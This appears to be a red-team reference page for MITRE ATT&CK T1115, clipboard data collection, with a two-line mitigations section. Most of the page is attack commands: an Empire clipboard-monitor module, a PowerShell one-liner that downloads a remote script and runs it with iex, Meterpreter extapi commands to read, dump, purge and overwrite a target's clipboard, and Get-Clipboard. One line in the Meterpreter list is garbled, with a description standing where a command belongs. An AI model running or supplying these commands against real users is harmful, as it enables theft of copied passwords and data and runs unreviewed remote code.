Clipboard Data

https://attack.mitre.org/techniques/T1115/

ATT&CK ID: T1115

Permissions Required: User

Description

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

In Windows, Applications can access clipboard data by using the Windows API.

[Source]

Techniques

Empire

This module monitors the clipboard on a specified interval for changes to copied text.

usemodule powershell/collection/clipboard_monitor

Get-ClipboardContents

Get-ClipboardContents monitors for information currently in the clipboard and anything that may be copied to the clipboard for the duration of the scripts execution time.

iex (iwr -usebasicparsing https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-ClipboardContents.ps1);Get-ClipboardContents

Metasploit

This Metasploit module can be loaded from the meterpreter shell.

load extapi

# Read the target's current clipboard (text, files, images)
clipboard_get_data

# Dump all captured clipboard content
clipboard_monitor_dump

# Pause the active clipboard monitor
clipboard_monitor_pause

# Delete all captured clipboard content without dumping it
clipboard_monitor_purge

# Resume the paused clipboard monitor
clipboard_monitor_resume

# Start the clipboard monitor   
Start the clipboard monitor

# Stop the clipboard monitor   
clipboard_monitor_stop

# Write text to the target's clipboard    
clipboard_set_text

PowerShell

The native PowerShell command Get-Clipboard retrieves information that is currently stored in the clipboard.

Get-Clipboard

Mitigations

Monitor executed commands and arguments to collect data stored in the clipboard from users copying information within or between applications.
Monitor API calls that could collect data stored in the clipboard from users copying information within or between applications.

Last updated 3 years ago